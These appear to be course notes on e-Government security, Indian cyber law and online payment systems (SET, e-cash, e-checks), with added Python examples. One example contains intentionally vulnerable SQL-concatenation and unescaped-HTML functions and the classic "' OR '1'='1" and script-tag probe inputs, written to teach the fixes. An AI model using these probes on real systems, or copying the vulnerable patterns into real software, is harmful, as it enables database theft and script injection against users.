• Non-repudiation - the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units.

• Protecting software applications used to process personal data.

• Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks.

• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and by whom, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS. Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;

• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;

• continually improve its control environment;

• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries that were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
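The two vulnerabilities just named, shown side by side in their vulnerable and hardened forms, as an added example that is not from the original notes: a constructed citizen-record lookup against an in-memory SQLite table (the table, rows and inputs are constructed for this illustration), where the fix for SQL injection is a parameterised query and the fix for XSS is output encoding.

```python
"""Added example (not from the original notes): SQL injection and XSS in a
tiny e-Government 'citizen record lookup', each as the vulnerable code and
its hardened replacement.  Table, rows and inputs are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory table of citizen records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizen (cid TEXT PRIMARY KEY, name TEXT, tax_id TEXT)")
    conn.executemany(
        "INSERT INTO citizen VALUES (?, ?, ?)",
        [("C100", "Asha", "TAX-0001"), ("C200", "Ravi", "TAX-0002")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, cid: str) -> list:
    """Builds the SQL by string concatenation, so user input becomes SQL syntax."""
    sql = "SELECT cid, name, tax_id FROM citizen WHERE cid = '" + cid + "'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, cid: str) -> list:
    """Parameterised query: the driver passes cid as data, never as SQL text."""
    sql = "SELECT cid, name, tax_id FROM citizen WHERE cid = ?"
    return conn.execute(sql, (cid,)).fetchall()


def render_vulnerable(name: str) -> str:
    """Reflects the value straight into HTML, so any markup in it is live."""
    return "<p>Welcome, " + name + "</p>"


def render_hardened(name: str) -> str:
    """Output encoding: html.escape turns <, >, &, and quotes into entities."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


def demo() -> dict:
    """Runs both forms against the classic test inputs and reports what happens."""
    conn = make_db()
    # A tautology in the id field: concatenated, it makes the WHERE clause
    # always true; parameterised, it is just an id that matches no record.
    probe = "' OR '1'='1"
    # A script tag in a display name: unencoded it would run in the browser.
    evil_name = "<script>alert('xss')</script>"
    return {
        "sqli_rows_vulnerable": len(lookup_vulnerable(conn, probe)),  # 2 (whole table)
        "sqli_rows_hardened": len(lookup_hardened(conn, probe)),      # 0
        "xss_vulnerable": render_vulnerable(evil_name),
        "xss_hardened": render_hardened(evil_name),
    }
```

The hardened lookup returns no rows for the probe because SQLite compares the literal string, and the hardened render leaves only entity text that a browser displays rather than executes.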

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

• 121 Million Internet Users

• 65 Million Active Internet Users, up by 28% from 51 million in 2010

• 50 Million users shop online on Ecommerce and Online Shopping Sites

• 46+ Million Social Network Users

• 346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• Secures access;

• Downloads, copies or extracts any data, computer database or any information;

• Introduces or causes to be introduced any virus or contaminant;

• Disrupts or causes disruption;

• Denies or causes denial of access to any person;

• Provides any assistance to any person to facilitate access;

• Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or

• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offenses and contraventions

4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment

65 | Tampering with computer source documents - intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means - sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Processing a Credit card payment –

Risk in using Credit cards -

• Operational Risk

• Credit Risk

• Legal Risk

Secure Electronic Transaction (SET) Protocol

• Jointly designed by MasterCard and Visa with the backing of Microsoft, Netscape, IBM, GTE, SAIC and others.

• Designed to provide security for card payments as they travel on the Internet.

• Contrasted with the Secure Sockets Layer (SSL) protocol, SET validates consumers and merchants in addition to providing secure transmission.

SET specification

• Uses public key cryptography and digital certificates for validating both consumers and merchants.

• Provides privacy, data integrity, user and merchant authentication and consumer non-repudiation.
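The notes list what SET provides but not the mechanism; the mechanism is SET's dual signature, which goes beyond the summary above and is shown here as an added example that is not from the original notes or from the SET specification. It signs a hash that links the order information (for the merchant) to the payment instruction (for the bank) so each party can verify the cardholder's single signature while seeing only its own half in clear; the RSA used is the textbook form with no padding, an assumed teaching stand-in rather than a production signature scheme, and all party names, amounts and card data are constructed.

```python
"""Added example (not from the original notes): SET's dual signature over
order information OI (merchant's half) and payment instruction PI (bank's
half).  The RSA here is textbook and unpadded, a teaching stand-in only;
names, amounts and card data are constructed."""
import hashlib
import random
from math import gcd


def _is_probable_prime(n: int, rounds: int = 25) -> bool:
    """Miller-Rabin probabilistic primality test."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits: int) -> int:
    """Random odd candidate with the top bit set, retried until probably prime."""
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand

def generate_keypair(bits: int = 512):
    """Textbook RSA: returns (public=(e, n), private=(d, n)); n is ~2*bits long."""
    e = 65537
    while True:
        p, q = _random_prime(bits), _random_prime(bits)
        phi = (p - 1) * (q - 1)
        if p != q and gcd(e, phi) == 1:
            return (e, p * q), (pow(e, -1, phi), p * q)

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def rsa_sign(private, digest: bytes) -> int:
    """Signature = digest^d mod n (a 256-bit digest is far below n)."""
    d, n = private
    return pow(int.from_bytes(digest, "big"), d, n)

def rsa_verify(public, digest: bytes, signature: int) -> bool:
    e, n = public
    return pow(signature, e, n) == int.from_bytes(digest, "big")

def make_dual_signature(cardholder_private, oi: bytes, pi: bytes):
    """DS = Sign_cardholder( H( H(OI) || H(PI) ) ).
    The merchant receives (OI, H(PI), DS); the bank receives (PI, H(OI), DS)."""
    h_oi, h_pi = sha256(oi), sha256(pi)
    ds = rsa_sign(cardholder_private, sha256(h_oi + h_pi))
    return {"oi": oi, "h_pi": h_pi, "ds": ds}, {"pi": pi, "h_oi": h_oi, "ds": ds}

def merchant_verify(cardholder_public, bundle) -> bool:
    """Merchant recomputes H(OI) from the order it can read; H(PI) is given."""
    pomd = sha256(sha256(bundle["oi"]) + bundle["h_pi"])
    return rsa_verify(cardholder_public, pomd, bundle["ds"])

def bank_verify(cardholder_public, bundle) -> bool:
    """Bank recomputes H(PI) from the payment data it can read; H(OI) is given."""
    pomd = sha256(bundle["h_oi"] + sha256(bundle["pi"]))
    return rsa_verify(cardholder_public, pomd, bundle["ds"])

def demo() -> dict:
    """Constructed transaction: one dual signature verified by both parties,
    then each half tampered with to show the signature no longer checks."""
    pub, priv = generate_keypair()
    oi = b"order=1;item=passport-renewal;amount=INR1500;merchant=gov-portal"
    pi = b"pan=4111111111111111;exp=12/29;amount=INR1500;merchant=gov-portal"  # constructed test PAN
    merchant_bundle, bank_bundle = make_dual_signature(priv, oi, pi)
    # Tampering: the merchant copy lowers the amount, the bank copy raises it.
    bad_merchant = dict(merchant_bundle, oi=oi.replace(b"INR1500", b"INR15"))
    bad_bank = dict(bank_bundle, pi=pi.replace(b"INR1500", b"INR150000"))
    return {
        "merchant_ok": merchant_verify(pub, merchant_bundle),
        "bank_ok": bank_verify(pub, bank_bundle),
        "merchant_sees_pan": b"4111" in merchant_bundle["oi"],  # privacy: False
        "merchant_rejects_tamper": not merchant_verify(pub, bad_merchant),
        "bank_rejects_tamper": not bank_verify(pub, bad_bank),
    }
```

Because both parties recompute the same linking hash, neither can substitute a different order or payment without the cardholder's signature failing, which is the integrity and non-repudiation property the list above credits to SET.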

The SET Protocol

What Is a Payment Gateway?

A payment gateway is an e-commerce application service provider service that authorizes payments for e-businesses, online shopping etc.

A payment gateway protects credit card details by encrypting sensitive information such as credit card numbers, to ensure that information passes securely between the customer and the merchant and also between the merchant and the payment processor.

How It Works

Payments In India

Going the e-way

e-PAYMENT SYSTEM IN INDIA

• Ever-increasing technology changes

• Growing Internet access and mobile subscriber base

• Rising consumer confidence

• Convenient delivery/payment models

• India has been one of the fastest growing countries for payment cards in the Asia-Pacific region

• India currently has approximately 130 million cards (both debit and credit) in circulation

GROWTH IN e-PAYMENT SYSTEM

REGULATION -

The Reserve Bank of India (RBI) has been supportive of the development of electronic payments. In this direction the "Payments and Settlement System Act" was enacted. Apart from being supportive, the RBI has also initiated various programs to encourage e-payments.

CHANNELS OF PAYMENT -

Indian banks have put in place various channels of electronic payment to encourage customers to adopt the electronic mode. Channels like the Internet, mobile, ATMs and drop boxes are some of the most frequently used channels, apart from bank branches.

MARKET MAPPING -

The e-payments processing market has two major players, namely Tech Process and Bill Desk, which is a pure-play electronic transaction processing company.

The Indian Payment System Is Transforming From Paper Mode To Electronic Mode

Two main reasons for such a shift are:

1. The regulator has mandated routing all high-value transactions electronically to minimize movement of money and risk.

2. At the retail end, customers are realizing the efficiency of electronic payments.

SHIFTS IN THE PAYMENT SYSTEM

TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT

• Electronic Clearing Service (Credit and Debit)

• National Electronic Fund Transfer (NEFT)

THE RULING PLASTIC MONEY

• Credit cards

• Debit cards

• ATM Cards

PayPal

PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods such as checks and money orders. It is subject to the US economic sanction list and other rules and interventions required by US laws or government. PayPal is an acquirer, performing payment processing for online vendors, auction sites and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States, at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Scottsdale, Charlotte and Austin in the United States; Chennai in India; Dublin in Ireland; Kleinmachnow in Germany; and Tel Aviv in Israel. From July 2007, PayPal has operated across the European Union as a Luxembourg-based bank.

Google Wallet

Google Wallet was launched in 2011, serving a similar function as PayPal to facilitate payments and transfer money online. It also features highly robust security and additional features, such as the ability to send payments as attachments via email.


CHARACTERISTICS OF PAYMENT SYSTEM

• There is no paper involved, so electronic payments can be effected directly from home or office.
• Fast, efficient, safe, secure and generally less costly than paper-based alternatives, e.g. cheques.
• Electronic payments are fully traceable.
• In Ireland the clearing time for standard electronic payments is next-day value for interbank transfers, subject to the payment instruction being received ahead of 'shut-off' times, which can vary from bank to bank. Payment instructions received after the 'shut-off' time will be processed one working day later.
• Most banks offer same-day value for payments made to other accounts held in that same bank.
• Many banks offer same-day money transfer inter-bank services for large-value payments.
• Unlike cheques, electronic payments don't 'bounce', as payments will not be effected unless the funds are available in the first place.


Features of Payment Methods

• Anonymity: whether the payment method is anonymous
• Security: whether the payment method is secure
• Overhead cost: the overhead cost of processing a payment
• Transferability: whether a payment can be carried out without the involvement of a third party
• Divisibility: whether a payment can be divided into arbitrarily small payments whose sum is equal to the original payment
• Acceptability: whether the payment method is supported globally

4C PAYMENT METHODS

To make the e-commerce system functional, we also need to incorporate payment functions into the system.

In the physical world there are 4 types of payment methods:

• Cash
• Credit card
• Check
• Credit/debit (fund transfer)

A payment method should be:

– Very secure
– Having low overhead cost
– Transferable
– Acceptable anywhere
– Divisible
– Anonymous

Comparison of the 4C payment methods


SET PROTOCOL FOR CREDIT CARD PAYMENT

• The credit card is one of the most commonly used payment methods in e-commerce, in particular B2C e-commerce.
• Before the introduction of the SET protocol, secure credit card payment was usually carried out over an SSL connection.

Advantage of SSL

• It ensures the secure transmission of credit card information over the Internet.

Disadvantage of SSL

• It is not a complete credit card payment method.
• For example, it cannot support on-line credit card authorization.

SET is specially developed to provide secure credit card payment over the Internet. It is now widely supported by major credit card companies, including Visa and MasterCard.


• SET aims at satisfying the following security requirements in the context of credit card payment:
  – Confidentiality: sensitive messages are encrypted so that they are kept confidential.
  – Integrity: nearly all messages are digitally signed to ensure content integrity.
  – Authentication: authentication is performed through a public key infrastructure.

SET network architecture

• Merchant: a seller, which is connected to an acquirer.
• Cardholder: a registered holder of the credit card, who is a buyer.
• Issuer: the bank that issues the credit card to a cardholder.
• Acquirer: the bank that serves as an "agent" to link a merchant to multiple issuers.
  – A merchant can process various credit cards through a single acquirer.
• Payment Gateway: this is typically connected to the acquirer.
  – The payment gateway is situated between the SET system and the financial network of the current credit card system, for processing the credit card payment.

SET Digital Certificate System


Dual signature generation and verification –

• In the physical credit card system:
  – the Payment Instructions (PI), including the cardholder's credit card number and signature, are not kept confidential;
  – data integrity can basically be ensured by using printed receipts;
  – cardholder authentication relies on simple signature checking only.
• In an electronic credit card system:
  – the Order Information (OI) and PI can be digitally signed to ensure data integrity;
  – the sensitive credit card information may still be disclosed to other people.
• SET introduces a novel method called the dual signature (DS) to ensure data integrity while protecting the sensitive information.


How the merchant and the payment gateway can verify the DS

• The merchant is provided with OI, H[PI] and DS.
• The dual signature can be verified as follows:

Step 1: The merchant first finds

H[ H[PI] || H[OI] ]

Step 2: He then decrypts the digital signature with the cardholder's public signature key as follows:

D_RSA[ DS | key_public_sign,cardholder ]

where key_public_sign,cardholder is the public signature key of the cardholder.

Step 3: Finally, he compares the two terms H[ H[PI] || H[OI] ] and D_RSA[ DS | key_public_sign,cardholder ]. They should be the same if the transmitted DS has not been changed; otherwise the order is not valid.

The payment gateway is provided with PI, H[OI] and DS.

By using the dual signature method, each cardholder can link OI and PI while releasing only the necessary information to the relevant party. If either the OI or PI is changed, the dual signature will no longer be valid.

DIGITAL ENVELOPE –


SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.
• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.
• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.
• Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers
• Customers
• Merchants or traders
• Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

• Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.
• Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.
• Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works; the model is explained in the following paragraphs.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.


In the third phase, the trader will approach the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds and the same will be transferred into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

• A system that allows a person to pay for goods or services by transmitting a number from one computer to another.
• Like the serial numbers on real currency notes, the E-cash numbers are unique.
• This is issued by a bank and represents a specified sum of real money.
• It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.
• Anonymity is preserved unless double spending is attempted.
• Serial numbers can allow tracing to prevent money laundering.
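The issuer side of the token flow described above (account setup, issuance of serial-numbered tokens, endorsement to the trader, and the authentication step that refuses a token presented twice), as an added example that is not code from the original notes or from any real e-cash product. The Issuer class, the HMAC-tagged tokens and the sample accounts are this example's constructions; it simplifies by letting the issuer see the serial at withdrawal, which a real scheme would hide with blind signatures.

```python
"""Issuer-side model of the e-cash flow described above: account setup,
withdrawal of serial-numbered tokens, endorsement to a trader, and issuer
authentication that credits the trader and refuses a token spent twice.
Added illustration, not code from any real e-cash product; tokens carry an
HMAC under the issuer's key (a real scheme would use blind signatures so the
issuer cannot link withdrawal and deposit, which this simplification skips)."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    serial: str  # unique, like the serial number on a banknote
    amount: int  # value in the smallest currency unit (cents)
    tag: str     # issuer authenticator over (serial, amount)


class Issuer:
    """Bank that mints tokens against a customer balance and redeems them."""

    def __init__(self):
        self._key = secrets.token_bytes(32)  # issuer secret, constructed here
        self.accounts = {}                   # account setup: holder -> balance
        self._spent = set()                  # serials already redeemed

    def _tag(self, serial, amount):
        msg = f"{serial}:{amount}".encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def open_account(self, holder, balance=0):
        self.accounts[holder] = balance

    def withdraw(self, holder, amount):
        """Issue one token of the requested denomination, debiting the account."""
        if amount <= 0 or self.accounts.get(holder, 0) < amount:
            raise ValueError("insufficient funds")
        self.accounts[holder] -= amount
        serial = secrets.token_hex(16)
        return Token(serial, amount, self._tag(serial, amount))

    def redeem(self, trader, token):
        """Authentication stage: verify the tag, reject double spending, credit trader."""
        if trader not in self.accounts:
            return "unknown-trader"
        # Constant-time compare so a forged tag cannot be guessed byte by byte.
        if not hmac.compare_digest(token.tag, self._tag(token.serial, token.amount)):
            return "forged"
        if token.serial in self._spent:
            return "double-spend"
        self._spent.add(token.serial)
        self.accounts[trader] += token.amount
        return "approved"


def demo():
    """Constructed run: a customer pays a trader, then the same token is replayed
    and an altered copy is presented; returns the issuer's verdicts and balances."""
    bank = Issuer()
    bank.open_account("alice", 5000)
    bank.open_account("shop")
    token = bank.withdraw("alice", 1000)   # phase 1: issuer mints the token
    first = bank.redeem("shop", token)     # phase 3: trader deposits it
    replay = bank.redeem("shop", token)    # same serial presented again
    altered = bank.redeem("shop", Token(token.serial, 100000, token.tag))
    return first, replay, altered, bank.accounts["alice"], bank.accounts["shop"]


if __name__ == "__main__":
    print(demo())  # ('approved', 'double-spend', 'forged', 4000, 1000)
```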

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password or anything similar is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind Internet security threats such as sweeping or theft. Online hacking and cracking can be avoided by using SSL and TLS website security, keeping the website link on the secure "HTTPS" protocol and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
• Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit below which no additional charges apply; that is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system is, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.
• While making the payment it is very important that the Internet connection and power supply are active. If the payment is in process and the Internet connection fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
• E-Cash is not for everyone. Low-income segments without computer and Internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make E-Cash more complete. Countries such as India, where people were hesitant to use such methods, have shown tremendous use of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read on for what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

